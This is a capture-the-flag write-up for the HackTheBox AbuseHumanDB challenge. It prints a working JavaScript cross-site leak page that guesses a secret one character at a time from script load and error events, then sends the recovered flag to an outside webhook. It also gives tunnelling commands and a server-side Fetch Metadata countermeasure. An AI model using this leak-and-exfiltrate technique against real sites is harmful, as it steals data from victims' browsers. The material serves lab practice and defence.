HackTheBox AbuseHumanDB Challenge
https://app.hackthebox.com/challenges/260
Description
We discovered a mysterious web portal that we believe is operated by aliens! Can you find out what they don’t want us to see?
Exploitation
Use a webhook service like https://app.interactsh.com/, a VPS with a public port, or a tunneling service to expose the service.
index.html
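<html>
<head></head>
<body>
<script type="text/javascript">
// Candidate characters for each flag position.
const flag_charset = "}0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!$()*,-[]_}";
let flag = "HTB{";   // known flag prefix, extended one character per successful guess
let charIndex = 0;   // index of the character currently being tested

const bruteForce = () => {
  // Request the search endpoint as a script: the load/error events reveal
  // whether the query (known prefix + candidate character) matched an entry.
  const script = document.createElement("script");
  script.src = `//127.0.0.1:1337/api/entries/search?q=${flag}${flag_charset.charAt(charIndex)}`;
  document.body.appendChild(script);

  // Load succeeded: the candidate is correct, keep it and restart the charset.
  script.onload = () => {
    flag += flag_charset.charAt(charIndex);
    charIndex = 0;
    script.parentNode.removeChild(script);
    if (flag.slice(-1) != '}') {
      bruteForce();
    } else {
      // Flag complete: report it to the webhook.
      const img = new Image();
      img.src = 'https://webhook.com?flag=' + flag; // <-- WebHookUrl
    }
  };

  // Load failed: no match, try the next candidate character.
  script.onerror = () => {
    script.parentNode.removeChild(script);
    charIndex += 1;
    bruteForce();
  };
};

bruteForce();
</script>
</body>
</html>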
python -m http.server
ssh -R 80:localhost:8000 localhost.run
Submit the tunnel's HTTP URL as the Abusive Content URL, then check your webhook.
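A server-side countermeasure to the load/error oracle that index.html relies on, as an added example that is not part of the original write-up or the challenge's code: it refuses cross-site subresource requests to the API using Fetch Metadata headers and answers a hit and a miss with the same status. The function names, the `title` field and the sample entries and requests are assumptions.

```javascript
// Added example (not the challenge's code). The Sec-Fetch-* header names are
// standard Fetch Metadata; function names and sample data are assumptions.

// Decide from browser-sent Fetch Metadata whether a request may reach the API.
function isAllowedApiRequest(headers) {
  const site = headers['sec-fetch-site'];
  const dest = headers['sec-fetch-dest'];
  // Clients that send no Fetch Metadata (older browsers, curl) are left to
  // the application's normal authentication checks.
  if (site === undefined) return true;
  // A JSON API is only fetched through fetch()/XHR, whose destination is
  // "empty"; <script>, <img> and <iframe> loads are refused.
  if (dest !== undefined && dest !== 'empty') return false;
  // Only the site's own front end may call the API.
  return site === 'same-origin';
}

// Search handler that returns 200 for a hit and a miss alike, so the HTTP
// status no longer tells the caller whether the query matched.
function handleSearch(headers, entries, q) {
  if (!isAllowedApiRequest(headers)) {
    return { status: 403, type: 'application/json', body: '{"error":"forbidden"}' };
  }
  const results = entries.filter((e) => e.title.includes(q));
  return { status: 200, type: 'application/json', body: JSON.stringify({ results }) };
}

// Constructed sample data and request headers.
const sampleEntries = [{ title: 'HTB{constructed_example}' }, { title: 'public note' }];
const crossSiteScript = {
  'sec-fetch-site': 'cross-site', 'sec-fetch-dest': 'script', 'sec-fetch-mode': 'no-cors',
};
const ownFrontEnd = {
  'sec-fetch-site': 'same-origin', 'sec-fetch-dest': 'empty', 'sec-fetch-mode': 'cors',
};

// A <script> load from another site is rejected whether or not the query matches.
console.log(handleSearch(crossSiteScript, sampleEntries, 'HTB{c').status);
console.log(handleSearch(crossSiteScript, sampleEntries, 'HTB{x').status);
// The site's own fetch() gets the same status for a hit and a miss.
console.log(handleSearch(ownFrontEnd, sampleEntries, 'HTB{c').status);
console.log(handleSearch(ownFrontEnd, sampleEntries, 'HTB{x').status);
```

Sending the JSON with `X-Content-Type-Options: nosniff` additionally keeps a browser from accepting it as a script.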
Summary
AbuseHumanDB: identify the broken request handling, prove control, and use it to recover the flag.